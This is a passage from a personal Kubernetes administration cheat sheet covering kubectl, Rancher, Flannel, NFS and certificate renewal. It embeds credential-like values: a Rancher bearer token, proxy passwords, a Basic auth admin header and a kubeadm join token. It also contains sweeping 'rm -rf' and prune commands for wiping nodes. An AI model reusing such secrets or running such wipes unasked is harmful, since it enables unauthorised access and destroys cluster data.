    --cgroup-driver=cgroupfs 
    --cni-bin-dir=/opt/cni/bin 
    --cni-conf-dir=/etc/cni/net.d 
    --network-plugin=cni 
    --resolv-conf=/run/systemd/resolve/resolv.conf 
    --feature-gates=DevicePlugins=true

kube-apiserver 
    --authorization-mode=Node,RBAC 
    --advertise-address=10.143.226.20 
    --allow-privileged=true 
    --client-ca-file=/etc/kubernetes/pki/ca.crt 
    --disable-admission-plugins=PersistentVolumeLabel 
    --enable-admission-plugins=NodeRestriction 
    --enable-bootstrap-token-auth=true 
    --etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt 
    --etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt 
    --etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key 
    --etcd-servers=https://127.0.0.1:2379 
    --insecure-port=0 
    --kubelet-client-certificate=/etc/kubernetes/pki/apiserver-kubelet-client.crt 
    --kubelet-client-key=/etc/kubernetes/pki/apiserver-kubelet-client.key 
    --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname 
    --proxy-client-cert-file=/etc/kubernetes/pki/front-proxy-client.crt 
    --proxy-client-key-file=/etc/kubernetes/pki/front-proxy-client.key 
    --requestheader-allowed-names=front-proxy-client 
    --requestheader-client-ca-file=/etc/kubernetes/pki/front-proxy-ca.crt 
    --requestheader-extra-headers-prefix=X-Remote-Extra- 
    --requestheader-group-headers=X-Remote-Group 
    --requestheader-username-headers=X-Remote-User 
    --secure-port=6443 
    --service-account-key-file=/etc/kubernetes/pki/sa.pub 
    --service-cluster-ip-range=10.96.0.0/12 
    --tls-cert-file=/etc/kubernetes/pki/apiserver.crt 
    --tls-private-key-file=/etc/kubernetes/pki/apiserver.key

kube-controller-manager
    --address=127.0.0.1
    --cluster-signing-cert-file=/etc/kubernetes/pki/ca.crt
    --cluster-signing-key-file=/etc/kubernetes/pki/ca.key
    --controllers=*,bootstrapsigner,tokencleaner
    --kubeconfig=/etc/kubernetes/controller-manager.conf
    --leader-elect=true
    --root-ca-file=/etc/kubernetes/pki/ca.crt
    --service-account-private-key-file=/etc/kubernetes/pki/sa.key
    --use-service-account-credentials=true

etcd
    --advertise-client-urls=https://127.0.0.1:2379
    --cert-file=/etc/kubernetes/pki/etcd/server.crt
    --client-cert-auth=true
    --data-dir=/var/lib/etcd
    --initial-advertise-peer-urls=https://127.0.0.1:2380
    --initial-cluster=gtxmachine0=https://127.0.0.1:2380
    --key-file=/etc/kubernetes/pki/etcd/server.key
    --listen-client-urls=https://127.0.0.1:2379
    --listen-peer-urls=https://127.0.0.1:2380
    --name=gtxmachine0
    --peer-cert-file=/etc/kubernetes/pki/etcd/peer.crt
    --peer-client-cert-auth=true
    --peer-key-file=/etc/kubernetes/pki/etcd/peer.key
    --peer-trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt
    --snapshot-count=10000
    --trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt

kube-scheduler 
    --address=127.0.0.1 
    --kubeconfig=/etc/kubernetes/scheduler.conf 
    --leader-elect=true

/usr/local/bin/kube-proxy 
    --config=/var/lib/kube-proxy/config.conf

/opt/bin/flanneld 
    --ip-masq 
    --kube-subnet-mgr

kubectl using different config file, kubectl config, different config kubectl

kubectl --kubeconfig=/home/user/.kube/config-student1 get pods

kubectl config with rancher, rancher with kubectl, rancher kubectl config

  • certificate-authority-data - from admin account
  • token - Bearer Token
apiVersion: v1
clusters:
- cluster:
    server: "https://10.14.22.20:9443/k8s/clusters/c-7w47z"
    certificate-authority-data: "....tLUVORCBDRVJUSUZJQ0FURS0tLS0t"
  name: "ev-cluster"

contexts:
- context:
    user: "ev-user"
    cluster: "ev-cluster"
  name: "ev-context"

current-context: "ev-context"

kind: Config
preferences: {}
users:
- name: "ev-user"
  user:  
    token: "token-6g4gv:lq4wbw4lmwtxkblmbbsbd7hc5j56v2ssjvfkxd"

update software

# check accessible list
sudo apt list | grep kube
# update system info
sudo apt-get update
# install one package
sudo apt-get install -y kubeadm=1.18.2-00
# FROM ubuntu:18
# environment
sudo apt install docker.io
sudo systemctl enable docker
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo apt-key add
sudo apt install curl
# kube
sudo apt-add-repository "deb http://apt.kubernetes.io/ kubernetes-xenial main"
sudo apt install kubeadm
sudo swapoff -a
# init for using flannel ( check inside kube-flannel.yaml section net-conf.json/Network )
sudo kubeadm init --pod-network-cidr=10.244.0.0/16
rm -rf $HOME/.kube
mkdir -p $HOME/.kube
sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
sudo chown $(id -u):$(id -g) $HOME/.kube/config
# !!! install flannel ( or weave.... )
# kubectl get nodes

install via rancher

docker stop rancher
docker rm rancher

# -it --entrypoint="/bin/bash" \
docker run -d --restart=unless-stopped \
  --name rancher \
  -v /var/lib/rancher:/var/lib/rancher \
  -v /var/lib/rancher-log:/var/log \
  -p 9080:80 -p 9443:443 \
  -e HTTP_PROXY="http://qqml:mlfu\$[email protected]:8080" \
  -e HTTPS_PROXY="http://qqml:mlfu\$[email protected]:8080" \
  -e NO_PROXY="localhost,127.0.0.1,127.0.0.0/8,10.0.0.0/8,192.168.0.0/16" \
  rancher/rancher:latest

uninstall

cleanup node

# clean up for worker
## !!! most important !!!
sudo rm -rf /etc/cni/net.d

sudo rm -rf /opt/cni/bin
sudo rm -rf /var/lib/kubelet 
sudo rm -rf /var/lib/cni 
sudo rm -rf /etc/kubernetes
sudo rm -rf /run/calico 
sudo rm -rf /run/flannel 

sudo rm -rf /etc/ceph 
sudo rm -rf /opt/rke
sudo rm -rf /var/lib/calico 
sudo rm -rf /var/lib/etcd

sudo rm -rf /var/log/containers 
sudo rm -rf /var/log/pods 

# rancher full reset !!!
sudo rm -rf /var/lib/rancher/*
sudo rm -rf /var/lib/rancher-log/*

kube logs

### Master
## API Server, responsible for serving the API
/var/log/kube-apiserver.log 
## Scheduler, responsible for making scheduling decisions
/var/log/kube-scheduler.log
## Controller that manages replication controllers
/var/log/kube-controller-manager.log
### Worker Nodes
## Kubelet, responsible for running containers on the node
/var/log/kubelet.log
## Kube Proxy, responsible for service load balancing
/var/log/kube-proxy.log

kubernetes CLI

kubernetes version, k8s version

kubeadm version

one of the field will be like: GitVersion:"v1.11.1"

kustomize build config/default | kubectl apply -f-

kubectl template, inline code

sed "s|<NODE_INSTANCE_IP>|$NODE_1_IP|" eks-localstorage.yaml-template >  | kubectl apply -f -

access cluster

  • reverse proxy

    used for caching, security, load balancing ( a forward proxy is just a 'proxy' ); activate the proxy from the current node

    kubectl proxy --port 9090
    # execute request against kubectl via reverse-proxy
    curl {current node ip}:9090/api
  • token access
    TOKEN=$(kubectl describe secret $(kubectl get secrets | grep ^default | cut -f1 -d ' ') | grep -E '^token' | cut -f2 -d':' | tr -d " ")
    echo $TOKEN | tee token.crt
    echo "Authorization: Bearer "$TOKEN | tee token.header
    # execute from remote node against ( cat ~/.kube/config | grep server )
    curl https://{ip:port}/api --header @token.header --insecure

connect to remote machine, rsh

# connect to remote machine
kubectl --namespace namespace-metrics --kubeconfig=config-rancher exec -ti sm-grafana-deployment-5bdb64-6dnb8 -- /bin/sh

copy from remote machine

# will fail if no `tar` in container !!!
kubectl --namespace "$KUBECONFIG_ENV" cp "$KUBECONFIG_ENV/$STREAM_POD_NAME:/deployment/app/cloud-application-kafka-streams*.jar" cloud-application-kafka-streams.jar

check namespaces

kubectl get namespaces

at least three namespaces will be provided

default       Active    15m
kube-public   Active    15m
kube-system   Active    15m

create namespace

kubectl create namespace my-own-namespace

or via yaml file

kubectl apply -f {filename}
kind: Namespace
apiVersion: v1
metadata:
  name: test

create limits for namespace

example for previous namespace declaration

apiVersion: v1
kind: LimitRange
metadata:
  name: my-own-namespace
spec:
  limits:
  - default:
      memory: 512Mi
    defaultRequest:
      memory: 256Mi
    type: Container

limits for certain container

apiVersion: v1
kind: Pod
metadata:
  name: frontend
spec:
  containers:
  - name: db
    image: mysql
    env:
    - name: MYSQL_ROOT_PASSWORD
      value: "password"
    resources:
      requests:
        memory: "64Mi"
        cpu: "250m"
      limits:
        memory: "128Mi"
        cpu: "500m"

also can be limited: pods, pv/pvc, services, configmaps...

print limits

kubectl get quota --namespace my-own-namespace
kubectl describe quota/compute-quota --namespace my-own-namespace
kubectl describe quota/object-quota --namespace my-own-namespace

kubectl describe {pod-name} limits 
kubectl describe {pod-name} limits --namespace my-own-namespace

delete namespace

kubectl delete namespace {name of namespace}

users

  • normal user
    • client certificates
    • bearer tokens
    • authentication proxy
    • http basic authentication
    • OpenId
  • service user
    • service account tokens
    • credentials using secrets
    • specific to namespace
    • created by objects
    • anonymous user ( not authenticated )

exeternal applications, user management, managing users

rbac

ps aux | grep kube-apiserver
# expected output
# --authorization-mode=Node,RBAC
# read existing roles 
kubectl get clusterRoles
# describe roles created by permission-management
kubectl describe clusterRoles/template-namespaced-resources___developer
kubectl describe clusterRoles/template-namespaced-resources___operation

# get all rolebindings
kubectl get RoleBinding --all-namespaces
kubectl get ClusterRoleBinding  --all-namespaces
kubectl get rolebindings.rbac.authorization.k8s.io --all-namespaces


# describe one of bindings
kubectl describe ClusterRoleBinding/student1___template-cluster-resources___read-only
kubectl describe rolebindings.rbac.authorization.k8s.io/student1___template-namespaced-resources___developer___students --namespace students 
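
bindings like the ones above can also be created ad hoc from the CLI ( a sketch; role, user and namespace names follow the examples above and are placeholders ):

# bind the built-in read-only "view" cluster role to a user inside one namespace
kubectl create rolebinding student1-view --clusterrole=view --user=student1 --namespace=students
# cluster-wide variant
kubectl create clusterrolebinding student1-view-all --clusterrole=view --user=student1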

Direct request to api, user management curl

TOKEN="Authorization: Basic YWRtaW46b2xnYSZ2aXRhbGlp"
curl -X GET -H "$TOKEN" http://localhost:4000/api/list-users

etcd

etcdctl installation

untar etcdctl from https://github.com/etcd-io/etcd/releases

etcd querying, etcd request key-values

docker exec -ti `docker ps | grep etcd | awk '{print $1}'` /bin/sh
etcdctl get / --prefix --keys-only
# etcdctl --endpoints=http://localhost:2379 get / --prefix --keys-only
etcdctl  get / --prefix --keys-only | grep permis
etcdctl  get /registry/namespaces/permission-manager -w=json

configuration, configmap

create configmap

example of configuration

color.ok=green
color.error=red
textmode=true
security.user.external.login_attempts=5

create configuration on cluster

kubectl create configmap my-config-file --from-env-file=/local/path/to/config.properties

the following configuration will be created

...
data:
color.ok=green
color.error=red
textmode=true
security.user.external.login_attempts=5

or configuration with additional key, additional abstraction over the properties ( like Map of properties )

kubectl create configmap my-config-file --from-file=name-or-key-of-config=/local/path/to/config.properties

created file is:

data:
name-or-key-of-config:
    color.ok=green
    color.error=red
    textmode=true
    security.user.external.login_attempts=5

or configuration with additional key based on filename ( key will be a name of file )

kubectl create configmap my-config-file --from-file=/local/path/to/

created file is:

data:
config.properties:
    color.ok=green
    color.error=red
    textmode=true
    security.user.external.login_attempts=5

or inline creation

kubectl create configmap special-config --from-literal=color.ok=green --from-literal=color.error=red

get configurations, read configuration in specific format

kubectl get configmap 
kubectl get configmap --namespace kube-system 
kubectl get configmap --namespace kube-system kube-proxy --output json

using configuration, using of configmap

  • one variable from configmap
    spec:
      containers:
        - name: test-container
          image: k8s.gcr.io/busybox
          command: [ "/bin/sh", "echo $(MY_ENVIRONMENT_VARIABLE)" ]
          env:
            - name: MY_ENVIRONMENT_VARIABLE
              valueFrom:
                configMapKeyRef:
                  name: my-config-file
                  key: security.user.external.login_attempts
  • all variables from configmap
    ...
         envFrom:
         - configMapRef:
             name: my-config-file

cluster information

kubectl cluster-info
kubectl cluster-info dump

start readiness, check cluster

kubectl get node
kubectl get pods
minikube dashboard

addons

minikube addons list
minikube addons enable ingress

labels

show labels for each node

kubectl get nodes --show-labels

add label to Node

kubectl label nodes {node name} my_label=my_value

remove label from Node

kubectl label nodes {node name} my_label-
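
labels become useful through selectors; with the node label above in place ( a sketch; the pod selector reuses the app=helloworld label from the examples below ):

# list only nodes carrying the label
kubectl get nodes -l my_label=my_value
# the same selector syntax works for pods
kubectl get pods -l app=helloworld --show-labels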

deployment

to see deployment from external world, remote access to pod, deployment access:
user ----> Route -----> Service ----> Deployment main schema

start dummy container

kubectl run hello-minikube --image=k8s.gcr.io/echoserver:1.4 --port=8080

start ubuntu and open shell

kubectl run --restart=Never --rm -it --image=ubuntu --limits='memory=123Mi' -- sh

create deployment ( with replica set )

kubectl run http --image=katacoda/docker-http-server:latest --replicas=1

scale deployment

scaling types

  • horizontal
  • vertical ( scaling up )

scaling example

deployment_name=my_deployment_name
## scale pod to amount of replicas
kubectl scale --replicas=3 deployment $deployment_name

## conditional scaling 
kubectl autoscale deployment $deployment_name --cpu-percent=50 --min=1 --max=3
# check Horizontal Pod Autoscaler (HPA)
kubectl get hpa 

create from yaml file

kubectl create -f /path/to/controller.yml

create/update yaml file

kubectl apply -f /path/to/controller.yml

create service, expose service, inline service fastly

kubectl expose deployment helloworld-deployment --type=NodePort --name=helloworld-service
kubectl expose deployment helloworld-deployment --external-ip="172.17.0.13" --port=8000 --target-port=80
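
an alternative to "minikube service" below: read back the assigned NodePort and reach the service via the cluster IP ( a sketch reusing the service name above ):

NODE_PORT=$(kubectl get svc helloworld-service -o jsonpath='{.spec.ports[0].nodePort}')
curl http://$(minikube ip):$NODE_PORT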

port forwarding, expose service

kubectl port-forward svc/my_service 8080 --namespace my_namespace

reach out service

minikube service helloworld-service
minikube service helloworld-service --url

service port range

kube-apiserver --service-node-port-range=30000-40000

describe resources, information about resources, inspect resources, inspect pod

kubectl describe deployment {name of deployment}
kubectl describe service {name of service}
kubectl describe pod {name of the pod}

describe secret, user token

kubectl --namespace kube-system describe secret admin-user

The operator reads information from external APIs (AWS Secrets Manager, HashiCorp Vault, Google Secrets Manager...)
and automatically injects the values into a Kubernetes Secret.

get resources

kubectl get all --all-namespaces
# check pod statuses 
kubectl get pods
kubectl get pods --namespace kube-system
kubectl get pods --show-labels
kubectl get pods --output=wide --selector="run=load-balancer-example" 
kubectl get pods --namespace training --field-selector="status.phase==Running,status.phase!=Unknown"
kubectl get service --output=wide
kubectl get service --output=wide --selector="app=helloworld"
kubectl get deployments
kubectl get replicasets
kubectl get nodes
kubectl get cronjobs
kubectl get daemonsets
kubectl get pods,deployments,services,rs,cm,pv,pvc -n demo

kubectl get services
kubectl describe service my_service_name

determine cluster 'hostIP' to reach the application(s)

minikube ip

open 'kube-dns-....'/hostIP open 'kube-proxy-....'/hostIP

edit configuration of controller

kubectl edit pod hello-minikube-{some random hash}
kubectl edit deploy hello-minikube
kubectl edit ReplicationControllers helloworld-controller
kubectl set image deployment/helloworld-deployment {name of image}

rollout status

kubectl rollout status  deployment/helloworld-deployment

rollout history

kubectl rollout history  deployment/helloworld-deployment
kubectl rollout undo deployment/helloworld-deployment
kubectl rollout undo deployment/helloworld-deployment --to-revision={number of revision from 'history'}

delete running container

kubectl delete pod hello-minikube-6c47c66d8-td9p2

delete deployment

kubectl delete deploy hello-minikube

delete ReplicationController

kubectl delete rc helloworld-controller

delete PV/PVC

oc delete pvc/pvc-scenario-output-prod

port forwarding from local to pod/deployment/service

the following recipes redirect 127.0.0.1:8080 to pod:6379

kubectl port-forward redis-master-765d459796-258hz      8080:6379 
kubectl port-forward pods/redis-master-765d459796-258hz 8080:6379
kubectl port-forward deployment/redis-master            8080:6379 
kubectl port-forward rs/redis-master                    8080:6379 
kubectl port-forward svc/redis-master                   8080:6379

NodeSelector for certain host

spec:
   template:
      spec:
         nodeSelector: 
            kubernetes.io/hostname: gtxmachine1-ev

persistent volume

kind: PersistentVolume
apiVersion: v1
metadata:
  name: pv-volume3
  labels:
    type: local
spec:
  capacity:
    storage: 10Gi
  accessModes:
    - ReadWriteOnce
  hostPath:
    path: "/mnt/data3"

to access created volume

ls /mnt/data3

list of existing volumes

kubectl get pv 
kubectl get pvc
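
a matching PersistentVolumeClaim sketch for the pv-volume3 above ( the claim name is hypothetical; the request must stay within the PV capacity ):

kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: pvc-volume3
spec:
  storageClassName: ""          # bind to a pre-created PV, skip dynamic provisioning
  accessModes:
    - ReadWriteOnce
  selector:
    matchLabels:
      type: local
  resources:
    requests:
      storage: 5Gi              # must not exceed the 10Gi of the PV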

be aware of the Init Container concept - a pod's main containers start only after all of its "init container(s)" have finished successfully ( the YAML below shows container lifecycle hooks; an initContainers sketch follows it )

apiVersion: v1
kind: Pod
metadata:
  name: lifecycle-demo
spec:
  containers:
  - name: lifecycle-demo-container
    image: nginx
    lifecycle:
      postStart:
        exec:
          command: ["/bin/sh", "-c", "echo Hello from the postStart handler > /usr/share/message"]
      preStop:
        exec:
          command: ["/bin/sh","-c","nginx -s quit; while killall -0 nginx; do sleep 1; done"]
containers:
  - name: lifecycle
    image: busybox
    lifecycle:
      postStart:
        exec:
          command:
            - "touch"
            - "/var/log/lifecycle/post-start"
      preStop:
        httpGet:
          path: "/abort"
          port: 8080
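
for comparison, a minimal initContainers sketch ( pod, image and service names are illustrative ) - the main container starts only after the init container exits successfully:

apiVersion: v1
kind: Pod
metadata:
  name: init-demo
spec:
  initContainers:
  - name: wait-for-service
    image: busybox
    command: ["sh", "-c", "until nslookup my-service; do echo waiting; sleep 2; done"]
  containers:
  - name: main-app
    image: nginx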

Serverless

  • OpenFaas
  • Kubeless
  • Fission
  • OpenWhisk

deploy Pod on Node with label

apiVersion: v1
kind: Pod
metadata:
...
spec:
...
  nodeSelector:
    my_label: my_value

create Deployment for specific node

apiVersion: apps/v1
kind: Deployment
metadata:
...
spec:
...
  nodeSelector:
    my_label: my_value

resolving destination node

when label was not found

  • nodeAffinity
    • preferred - deploy in any case, with preference for my_label=my_value
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
      - weight: 1
        preference:
          matchExpressions:
          - key: my_label
            operator: In
            values:
            - my_value
  • required - deploy only when label matched my_label=my_value
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: my_label
            operator: In
            values:
            - my_value
  • nodeAntiAffinity - not a real API field; node anti-affinity is expressed via nodeAffinity with the NotIn / DoesNotExist operators
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        # matchExpressions with operator: NotIn keeps pods away from nodes carrying the label
  • podAffinity
    • preferred spec.affinity.podAffinity.preferredDuringSchedulingIgnoredDuringExecution
    • required spec.affinity.podAffinity.requiredDuringSchedulingIgnoredDuringExecution
  • podAntiAffinity ( see the sketch after this list )
    • preferred spec.affinity.podAntiAffinity.preferredDuringSchedulingIgnoredDuringExecution
    • required spec.affinity.podAntiAffinity.requiredDuringSchedulingIgnoredDuringExecution
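
a podAntiAffinity sketch for the spec paths listed above - keep pods carrying the ( hypothetical ) label app=my-app on different nodes:

spec:
  affinity:
    podAntiAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
      - labelSelector:
          matchExpressions:
          - key: app
            operator: In
            values:
            - my-app
        topologyKey: kubernetes.io/hostname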

delete node from cluster

kubectl get nodes
kubectl delete node {node name}

add node to cluster

ssh {master node}
kubeadm token create --print-join-command  --ttl 0

expected result from previous command

kubeadm join 10.14.26.210:6443 --token 7h0dmx.2v5oe1jwed --discovery-token-ca-cert-hash sha256:1d28ebf950316b8f3fdf680af5619ea2682707f2e966fc0

go to node, clean up and apply token

ssh {node address}
# hard way: rm -rf /etc/kubernetes
kubeadm reset
# apply token from previous step with additional flag: --ignore-preflight-errors=all
kubeadm join 10.14.26.210:6443 --token 7h0dmx.2v5oe1jwed --discovery-token-ca-cert-hash sha256:1d28ebf950316b8f3fdf680af5619ea2682707f2e966fc0 --ignore-preflight-errors=all

expected result from previous command

...
This node has joined the cluster:
* Certificate signing request was sent to master and a response
  was received.
* The Kubelet was informed of the new secure connection details.
 
Run 'kubectl get nodes' on the master to see this node join the cluster. 

next block is not mandatory in most cases

systemctl restart kubelet

logs

kubectl logs <name of pod>

create dashboard

kubectl create -f https://raw.githubusercontent.com/kubernetes/dashboard/master/aio/deploy/recommended/kubernetes-dashboard.yaml

access dashboard

kubectl -n kube-system describe secret admin-user
http://127.0.0.1:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/#!/overview?namespace=default
kubectl proxy

common

execute command on specific pod

kubectl exec -it {name of a pod}  -- bash -c "echo hi > /path/to/output/test.txt" 

Extending

Weave

kubectl apply -f "https://cloud.weave.works/k8s/net?k8s-version=$(kubectl version | base64 | tr -d '\n')"

Flannel

deployment diagram restart nodes

# remove died pods
kubectl delete pods kube-flannel-ds-amd64-zsfz  --grace-period=0 --force
# delete all resources from file and ignore not found
kubectl delete --ignore-not-found -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml
kubectl create  -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml

install flannel

### apply this with possible issue with installation: 
## kube-flannel.yml": daemonsets.apps "kube-flannel-ds-s390x" is forbidden: User "system:node:name-of-my-server" cannot get daemonsets.apps in the namespace "kube-system"
# sudo kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/a70459be0084506e4ec919aa1c114638878db11b/Documentation/kube-flannel.yml

## Container runtime network not ready: NetworkReady=false reason:NetworkPluginNotReady message:docker: network plugin is not ready: cni config uninitialized
# sudo kubectl -n kube-system apply -f https://raw.githubusercontent.com/coreos/flannel/bc79dd1505b0c8681ece4de4c0d86c5cd2643275/Documentation/kube-flannel.yml

## print all logs
journalctl -f -u kubelet.service
# $KUBELET_NETWORK_ARGS in 
# /etc/systemd/system/kubelet.service.d/10-kubeadm.conf

## ideal way, not working properly in most cases
sudo kubectl -n kube-system apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml

## check installation 
ps aux | grep flannel
# root     13046  0.4  0.0 645968 24748 ?        Ssl  10:49   0:00 /opt/bin/flanneld --ip-masq --kube-subnet-mgr

ifconfig
cni0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 10.244.0.1  netmask 255.255.255.0  broadcast 0.0.0.0
flannel.1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1450
        inet 10.244.0.0  netmask 255.255.255.255  broadcast 0.0.0.0

change settings and restart

kubectl edit cm kube-flannel-cfg -n kube-system
# net-conf.json: | { "Network": "10.244.0.0/16", "Backend": { "Type": "vxlan" } }

# Wipe current CNI network interfaces remaining the old network pool:
sudo ip link del cni0; sudo ip link del flannel.1

# Re-spawn Flannel and CoreDNS pods respectively:
kubectl delete pod --selector=app=flannel -n kube-system
kubectl delete pod --selector=k8s-app=kube-dns -n kube-system

# waiting for restart of all services

read logs

kubectl logs --namespace kube-system kube-flannel-ds-amd64-j4frw -c kube-flannel 

read logs from all pods

for each_node in $(kubectl get pods --namespace kube-system | grep flannel | awk '{print $1}');do echo $each_node;kubectl logs --namespace kube-system $each_node -c kube-flannel;done

read settings

kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp ls /etc/kube-flannel/
kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp cat /etc/kube-flannel/cni-conf.json
kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp cat /etc/kube-flannel/net-conf.json

kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp ls /run/flannel/
kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp cat /run/flannel/subnet.env

kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp ls /etc/cni/net.d
kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp cat /etc/cni/net.d/10-flannel.conflist

read DNS logs

kubectl get svc --namespace=kube-system | grep kube-dns
kubectl logs --namespace=kube-system coredns-78fcd94-7tlpw | tail

simple POD, dummy pod, waiting pod

kind: Pod
apiVersion: v1
metadata:
  name: sleep-dummy-pod
  namespace: students
spec:
  containers:
    - name: sleep-dummy-pod
      image: ubuntu
      command: ["/bin/bash", "-ec", "while :; do echo '.'; sleep 3600 ; done"]
  restartPolicy: Never

NFS ( Network File System )

nfs server

# nfs server 
vim /etc/exports
# /mnt/disks/k8s-local-storage/nfs        10.55.0.0/16(rw,sync,no_subtree_check)
# /mnt/disks/k8s-local-storage1/nfs       10.55.0.0/16(rw,sync,no_subtree_check)

sudo exportfs -a
sudo exportfs -v

systemctl status nfs-server
ll /sys/module/nfs/parameters/
ll /sys/module/nfsd/parameters/
sudo blkid
sudo vim /etc/fstab
# UUID=35c71cfa-6ee2-414a-5555-effc30555555 /mnt/disks/k8s-local-storage ext4 defaults 0 0
# UUID=42665716-1f89-44d4-5555-37b207555555 /mnt/disks/k8s-local-storage1 ext4 defaults 0 0
nfsstat

master. mount volume ( nfs server )

# create point 
sudo mkdir /mnt/disks/k8s-local-storage1
# mount 
sudo mount /dev/sdc /mnt/disks/k8s-local-storage1
sudo chmod 755 /mnt/disks/k8s-local-storage1
# createlink 
sudo ln -s /mnt/disks/k8s-local-storage1/nfs /mnt/nfs1
ls -la /mnt/disks
ls -la /mnt

# update storage
sudo cat /etc/exports
# /mnt/disks/k8s-local-storage1/nfs       10.55.0.0/16(rw,sync,no_subtree_check)

# restart 
sudo exportfs -a
sudo exportfs -v

nfs client

sudo blkid

sudo mkdir /mnt/nfs1
sudo chmod 777 /mnt/nfs1

sudo vim /etc/fstab
# add record
# 10.55.0.3:/mnt/disks/k8s-local-storage1/nfs /mnt/nfs1 nfs rw,noauto,x-systemd.automount,x-systemd.device-timeout=10,timeo=14 0 0
10.55.0.3:/mnt/disks/k8s-local-storage1/nfs /mnt/nfs1 nfs defaults 0 0

# refresh fstab
sudo mount -av

# for server 
ls /mnt/disks/k8s-local-storage
ls /mnt/disks/k8s-local-storage1

# for clients
ls /mnt/disks/k8s-local-storage1

troubleshooting, problem resolving

POD_NAME=service-coworking-postgresql-0

kubectl get pod $POD_NAME -o json
kubectl describe pod $POD_NAME

kubectl get --watch events
kubectl get events --sort-by=.metadata.creationTimestamp
kubectl get events --field-selector type=Warning
kubectl get events --field-selector type=Error
kubectl get events --field-selector type=Critical

kubectl get pvc data-service-coworking-postgresql-0 -o json

postgresql waiting for a volume to be created

create provider

kubectl get all -l app.kubernetes.io/name=aws-ebs-csi-driver -n kube-system

certificate is expired

bootstrap.go:195] Part of the existing bootstrap client certificate is expired: 2019-08-22 11:29:48 +0000 UTC

solution

sudo cat /etc/systemd/system/kubelet.service.d/10-kubeadm.conf

# archive configuration
sudo cp -r /etc/kubernetes/pki /etc/kubernetes/pki_backup
sudo mkdir /etc/kubernetes/conf_backup
sudo cp /etc/kubernetes/*.conf /etc/kubernetes/conf_backup

# remove certificates
sudo rm /etc/kubernetes/pki/./apiserver-kubelet-client.crt 
sudo rm /etc/kubernetes/pki/./etcd/healthcheck-client.crt 
sudo rm /etc/kubernetes/pki/./etcd/server.crt 
sudo rm /etc/kubernetes/pki/./etcd/peer.crt 
sudo rm /etc/kubernetes/pki/./etcd/ca.crt 
sudo rm /etc/kubernetes/pki/./front-proxy-client.crt 
sudo rm /etc/kubernetes/pki/./apiserver-etcd-client.crt 
sudo rm /etc/kubernetes/pki/./front-proxy-ca.crt 
sudo rm /etc/kubernetes/pki/./apiserver.crt 
sudo rm /etc/kubernetes/pki/./ca.crt 
sudo rm /etc/kubernetes/pki/apiserver.crt 
sudo rm /etc/kubernetes/pki/apiserver-etcd-client.crt 
sudo rm /etc/kubernetes/pki/apiserver-kubelet-client.crt 
sudo rm /etc/kubernetes/pki/ca.crt 
sudo rm /etc/kubernetes/pki/front-proxy-ca.crt 
sudo rm /etc/kubernetes/pki/front-proxy-client.crt 

# remove configurations
sudo rm /etc/kubernetes/apiserver-kubelet-client.*
sudo rm /etc/kubernetes/front-proxy-client.*
sudo rm /etc/kubernetes/etcd/*
sudo rm /etc/kubernetes/apiserver-etcd-client.*
sudo rm /etc/kubernetes/admin.conf
sudo rm /etc/kubernetes/controller-manager.conf
sudo rm /etc/kubernetes/kubelet.conf
sudo rm /etc/kubernetes/scheduler.conf

# re-init certificates
sudo kubeadm init phase certs all --apiserver-advertise-address {master ip address} --ignore-preflight-errors=all

# re-init configurations
sudo kubeadm init phase kubeconfig all --ignore-preflight-errors=all

# re-start
sudo systemctl stop kubelet.service
sudo systemctl restart docker.service
docker system prune -af --volumes
reboot

# /usr/bin/kubelet
sudo systemctl start kubelet.service

# init locate kubectl
sudo cp /etc/kubernetes/admin.conf ~/.kube/config

# check certificate
openssl x509 -in /etc/kubernetes/pki/apiserver.crt  -noout -text  | grep "Not After"

template frameworks

Troubleshooting

issue with PV / PVC

pod has unbound immediate PersistentVolumeClaims. preemption: 0/2 nodes are available: 2 No preemption victims found for incoming pod..

when creating - check PV & PVC capacities ( requested space ): the PVC must not request more storage than the PV provides

LDAP cheat sheet

implementation

commands

whoami

ldapwhoami -x -v -H $LDAP_HOST -D $LDAP_USER -w $LDAP_PASSWORD
ldapwhoami -x -v -D "CN=Vitalii,OU=Users,OU=UBS,OU=Accounts,DC=vantage,DC=org" -H ldaps://ubsinfesv0015.vantage.org:636 -W
# CN - Common Name
# OU - Organizational Unit
# DC - Domain Component

perform user search

LDAP_HOST="ldaps://ldap.ubshost.net:5522"
LDAP_USER="uid=techuserldap,ou=people,dc=ubshost,dc=com"
LDAP_PASSWORD='' 

# log from ldap
# SEARCH conn=61392 op=3 msgID=4 base="ou=groups,dc=com" scope=sub filter="(uid=normaluser)" attrs="ismemberof" requestControls=2.26.140.2.2730.4.1.0 result=0 nentries=0 entrySize=975 authDN="uid=techuserldap,ou=people,dc=ubshost,dc=com" etime=372222
BASE_DN="ou=groups,dc=com"; 
LDAP_FILTER="uid=normaluser"; 

